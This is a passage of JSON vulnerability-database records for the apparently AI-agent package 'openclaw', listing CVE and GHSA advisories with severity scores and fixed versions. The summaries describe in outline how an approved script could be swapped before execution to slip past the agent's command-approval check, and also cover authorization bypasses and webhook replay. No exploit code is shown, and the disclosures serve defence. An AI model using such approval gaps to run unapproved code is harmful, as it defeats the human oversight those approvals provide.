N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-c28g-vh7m-fm7v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44991","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44991"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-owner-enforced-commands-via-wildcard-channel-senders","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-owner-enforced-commands-via-wildcard-channel-senders"},{"reference_url":"https://github.com/advisories/GHSA-c28g-vh7m-fm7v","reference_id":"GHSA-c28g-vh7m-fm7v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c28g-vh7m-fm7v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/111520?format=json","purl":"pkg:npm/openclaw@2026.4.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.21"}],"aliases":["CVE-2026-44991","GHSA-c28g-vh7m-fm7v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a4jz-y9s4-zkfg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91653?format=json","vulnerability_id":"VCID-aawy-8xg4-1uen","summary":"OpenClaw: Unbound interpreter and runtime commands could bypass node-host approval integrity\n## Summary\nIn affected versions of `openclaw`, node-host `system.run` approvals could still execute rewritten local code for interpreter and runtime commands when OpenClaw could not bind exactly one concrete local file operand during approval planning.\n\n## Impact\nDeployments using node-host `system.run` approval mode could approve a benign local script and then execute different local code if that script changed before execution. This can lead to unintended local code execution as the OpenClaw runtime user.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe approval flow treated some interpreter and runtime forms as approval-backed even when it could not honestly bind a single direct local script file. That left residual approval-integrity gaps for runtime forms outside the directly bound file set.\n\n## Fix\nOpenClaw now fails closed for approval-backed interpreter and runtime commands unless it can bind exactly one concrete local file operand, and it extends best-effort direct-file binding for additional runtime forms. The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32979","reference_id":"","reference_type":"","scores":[{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15747","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15697","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15738","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32979"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xf99-j42q-5w5p","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-30T12:49:40Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xf99-j42q-5w5p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32979","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32979"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unbound-interpreter-and-runtime-commands-bypass-in-node-host-approval","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-30T12:49:40Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unbound-interpreter-and-runtime-commands-bypass-in-node-host-approval"},{"reference_url":"https://github.com/advisories/GHSA-xf99-j42q-5w5p","reference_id":"GHSA-xf99-j42q-5w5p","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xf99-j42q-5w5p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["CVE-2026-32979","GHSA-xf99-j42q-5w5p"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-aawy-8xg4-1uen"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91667?format=json","vulnerability_id":"VCID-ad1h-m5fz-f3hu","summary":"Duplicate Advisory: OpenClaw's voice-call Twilio webhook replay could bypass manager dedupe because normalized event IDs were randomized per parse\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-vqx8-9xxw-f2m7. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.23 contain a vulnerability in Twilio webhook event deduplication where normalized event IDs are randomized per parse, allowing replay events to bypass manager dedupe checks. Attackers can replay Twilio webhook events to trigger duplicate or stale call-state transitions, potentially causing incorrect call handling and state corruption.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/1d28da55a5d0ff409e34999e0961157e9db0a2ab","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1d28da55a5d0ff409e34999e0961157e9db0a2ab"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-twilio-webhook-replay-bypass-via-randomized-event-id-normalization","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-twilio-webhook-replay-bypass-via-randomized-event-id-normalization"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32053","reference_id":"CVE-2026-32053","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32053"},{"reference_url":"https://github.com/advisories/GHSA-3r78-rqg8-95gg","reference_id":"GHSA-3r78-rqg8-95gg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3r78-rqg8-95gg"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vqx8-9xxw-f2m7","reference_id":"GHSA-vqx8-9xxw-f2m7","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vqx8-9xxw-f2m7"}],"fixed_packages":[],"aliases":["GHSA-3r78-rqg8-95gg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ad1h-m5fz-f3hu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91683?format=json","vulnerability_id":"VCID-afkf-r949-dkgu","summary":"OpenClaw: Write-scoped callers could reach admin-only session reset logic through `agent`\n## Summary\nIn affected versions of `openclaw`, a gateway caller with `operator.write` could issue `agent` requests containing `/new` or `/reset` and reach the same reset path used by the admin-only `sessions.reset` RPC.\n\n## Impact\nOn gateways where a caller is intentionally granted `operator.write` but not `operator.admin`, that caller could reset targeted conversation state through `agent` slash commands. This crosses the documented method-scope boundary between write-scoped messaging and admin-only session mutation.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: 